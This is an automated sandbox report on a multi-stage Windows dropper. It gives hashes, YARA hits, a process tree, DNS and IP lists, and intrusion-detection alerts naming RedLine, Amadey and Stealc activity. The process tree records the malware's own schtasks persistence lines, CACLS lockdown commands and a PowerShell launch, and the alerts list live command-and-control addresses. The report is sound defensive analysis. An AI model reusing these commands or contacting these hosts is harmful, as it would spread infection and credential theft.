Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 3, 2023, 12:03 p.m.	Nov. 3, 2023, 12:05 p.m.

Size	1.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`701ea7974b3f98830d636e93f836cfce`
SHA256	`386402abb9c4543365036a460814bd9109ef3dde074e851f9770847064f8ccd7`
CRC32	`44F22786`
ssdeep	`24576:pyiEsEtfvjJX4ckrL/zEER15FaM6L11CTyb0lPnVDahS5K:cbRfv9X4/zEM5F6gAhS5`
PDB Path	wextract.pdb
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) CAB_file_format - CAB archive file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

lom30.exe "C:\Users\test22\AppData\Local\Temp\lom30.exe"
156
- wO6Ck20.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\wO6Ck20.exe
  2056
  - Nv3yt53.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\Nv3yt53.exe
    2124
    - WJ6Vx46.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\WJ6Vx46.exe
      2184
      - nx7on92.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\nx7on92.exe
        2236
        
        UM3WU63.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\UM3WU63.exe
        2280
        
        1sI72Ue2.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1sI72Ue2.exe
        2324
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2440
        
        2Dy2976.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2Dy2976.exe
        2500
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2552
        
        kKAu9cP3NNRIkrC.exe "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe"
        3512
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
        3892
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC"
        2104
        
        ujtOIdrpHPHQwyp.exe "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe"
        3132
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        4136
        
        ESPCid2h8QyYJ9b.exe "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe"
        4168
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
        3456
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp"
        4460
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
        4256
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe" /tn "\WindowsAppPool\ESPCid2h8QyYJ9b"
        4676
        
        HJrKFxe4WGaGi18.exe "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe"
        4504
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
        4636
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\HJrKFxe4WGaGi18.exe" /tn "\WindowsAppPool\HJrKFxe4WGaGi18"
        4848
        
        Rik3e2Qqnc0PuCo.exe "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe"
        4724
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
        4804
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\Rik3e2Qqnc0PuCo.exe" /tn "\WindowsAppPool\Rik3e2Qqnc0PuCo"
        4996
        
        1RGRO2VMheQXHJb.exe "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe"
        4928
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        4152
        
        4eOZbn8zB4sFM67.exe "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe"
        5116
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        1800
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
        5020
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\1RGRO2VMheQXHJb.exe" /tn "\WindowsAppPool\1RGRO2VMheQXHJb"
        4276
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
        160
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\4eOZbn8zB4sFM67.exe" /tn "\WindowsAppPool\4eOZbn8zB4sFM67"
        4704
        
        3sR15gk.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3sR15gk.exe
        2616
      - 4yJ653Pm.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4yJ653Pm.exe
        2680
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2820
    - 5ih1Ry7.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5ih1Ry7.exe
      2884
      - explothe.exe "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe"
        2964
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        2152
        
        cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
        2388
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2584
        
        cacls.exe CACLS "explothe.exe" /P "test22:N"
        2636
        
        cacls.exe CACLS "explothe.exe" /P "test22:R" /E
        2780
        
        cacls.exe CACLS "..\fefffe8cea" /P "test22:N"
        2684
        
        cacls.exe CACLS "..\fefffe8cea" /P "test22:R" /E
        2952
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000062041\2.ps1"
        2168
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
        3120
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3120 CREDAT:145409
        3348
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com/
        3228
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef3046e00,0x7fef3046e10,0x7fef3046e20
        3468
        
        tus.exe "C:\Users\test22\AppData\Local\Temp\1000063051\tus.exe"
        2424
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3160
        
        foto1661.exe "C:\Users\test22\AppData\Local\Temp\1000064051\foto1661.exe"
        3676
        
        ia7EY5bf.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\ia7EY5bf.exe
        3768
        
        IC5lf7sp.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\IC5lf7sp.exe
        3880
        
        kT8ZN2eG.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\kT8ZN2eG.exe
        3972
        
        rS4RY2Ex.exe C:\Users\test22\AppData\Local\Temp\IXP006.TMP\rS4RY2Ex.exe
        2672
        
        1Do72qt6.exe C:\Users\test22\AppData\Local\Temp\IXP007.TMP\1Do72qt6.exe
        1668
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        1664
        
        2VB535Hz.exe C:\Users\test22\AppData\Local\Temp\IXP007.TMP\2VB535Hz.exe
        4308
        
        3Sw6MV84.exe C:\Users\test22\AppData\Local\Temp\IXP006.TMP\3Sw6MV84.exe
        3660
        
        4Pu488xz.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\4Pu488xz.exe
        4708
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3496
        
        5EA47Tb.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5EA47Tb.exe
        4696
        
        6RE44dd.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe
        2408
        
        cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\F65C.tmp\F65D.tmp\F65E.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6RE44dd.exe"
        2900
        
        salo.exe "C:\Users\test22\AppData\Local\Temp\1000065051\salo.exe"
        4060
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3264
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        4340
  - 6JR6gF0.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6JR6gF0.exe
    3000
- 7YD3dv41.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe
  3056
  - cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\D4CF.tmp\D4E0.tmp\D4E1.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe"
    2264
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
      3048
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:145409
        2548
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:79877
        3816
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:210945
        3212
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:79894
        5024
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
accounts.google.com	A 142.250.66.45	142.250.206.205
fbcdn.net	A 157.240.215.35	157.240.215.35
connect.facebook.net	A 157.240.215.14 CNAME scontent.xx.fbcdn.net	157.240.215.14
facebook.com	A 157.240.215.35	157.240.215.35
twitter.com	A 104.244.42.129	104.244.42.1
static-assets-prod.unrealengine.com	A 18.64.8.109 A 18.64.8.66 CNAME d1z9autcf703pk.cloudfront.net A 18.64.8.108 A 18.64.8.127	18.64.8.66
ssl.gstatic.com	A 172.217.31.3	142.250.207.99
www.paypal.com	A 146.75.49.21 CNAME paypal-dynamic.map.fastly.net CNAME www.glb.paypal.com	151.101.193.21
steamcommunity.com	A 104.75.41.21 A 104.76.78.101	104.76.78.101
fonts.googleapis.com	A 142.250.66.42	142.250.207.106
fonts.gstatic.com	A 142.251.130.3	142.250.207.99
static.xx.fbcdn.net	A 157.240.215.14 CNAME scontent.xx.fbcdn.net	157.240.215.14
fbsbx.com	A 157.240.215.35	157.240.215.35
www.youtube.com	A 142.250.66.46 A 142.251.220.78 A 142.250.204.110 A 172.217.31.14 A 216.58.203.78 A 142.251.220.110 A 142.250.204.46 A 216.58.200.238 A 142.250.199.78 A 142.250.204.78 A 142.251.220.14 A 142.251.220.46 A 142.251.222.206 A 142.251.130.14 CNAME youtube-ui.l.google.com A 142.250.204.142 A 172.217.24.78	172.217.31.142
www.epicgames.com	CNAME epicgames.com A 72.44.55.16 A 34.199.229.22 A 52.44.42.239 A 34.203.168.32 A 34.206.130.105 A 35.170.6.128 A 52.45.237.32 A 52.73.203.42 A 3.224.236.2 A 54.175.89.124 A 18.214.77.161 A 18.213.139.177 A 44.216.163.13 A 3.215.51.251 A 18.213.62.54	52.204.190.22
www.facebook.com	A 157.240.215.35 CNAME star-mini.c10r.facebook.com	157.240.215.35
store.steampowered.com	A 104.94.217.48 A 23.40.44.77	23.40.44.77
www.google.com	A 216.58.200.228	142.250.76.132
community.cloudflare.steamstatic.com	A 104.18.42.105 A 172.64.145.151	172.64.145.151

IP Address	Status	Action
104.244.42.129	Active	Moloch
104.75.41.21	Active	Moloch
104.76.78.101	Active	Moloch
104.94.217.48	Active	Moloch
117.18.232.200	Active	Moloch
142.250.204.46	Active	Moloch
142.250.66.42	Active	Moloch
142.250.66.45	Active	Moloch
142.251.130.3	Active	Moloch
142.251.220.78	Active	Moloch
146.75.49.21	Active	Moloch
157.240.215.14	Active	Moloch
157.240.215.35	Active	Moloch
164.124.101.2	Active	Moloch
172.217.31.3	Active	Moloch
172.64.145.151	Active	Moloch
18.64.8.109	Active	Moloch
18.64.8.127	Active	Moloch
193.233.255.73	Active	Moloch
216.58.200.228	Active	Moloch
23.40.44.77	Active	Moloch
52.45.237.32	Active	Moloch
54.175.89.124	Active	Moloch
77.91.124.1	Active	Moloch
77.91.124.86	Active	Moloch
77.91.68.249	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2047625	ET MALWARE [ANY.RUN] Win32/Stealc Checkin (POST)	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.103:49196	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 77.91.68.249:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 77.91.68.249:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 77.91.68.249:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.249:80 -> 192.168.56.103:49193	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.249:80 -> 192.168.56.103:49193	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.249:80 -> 192.168.56.103:49193	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 23.40.44.77:443 -> 192.168.56.103:49219	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49205 -> 77.91.68.249:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49201 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49214 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49216 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49220 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.68.249:80 -> 192.168.56.103:49205	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.249:80 -> 192.168.56.103:49205	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.249:80 -> 192.168.56.103:49205	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49227 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49228 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49230 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49200 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49226 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49243 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 77.91.124.1:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49190 -> 77.91.124.1:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49205 -> 77.91.68.249:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49248 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49247 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49233 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49207 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49251 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 52.45.237.32:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49252 -> 52.45.237.32:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49253 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49278 -> 18.64.8.127:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49261 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49256 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49265 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49266 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49263 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49260 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49272 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49277 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49267 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49273 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49269 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49271 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49276 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49270 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49274 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49283 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49284 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49288 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49255 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49286 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49264 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49280 -> 18.64.8.127:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49268 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49275 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49282 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49293 -> 142.251.220.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49301 -> 142.251.130.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49302 -> 142.251.130.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49305 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49341 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49317 -> 216.58.200.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
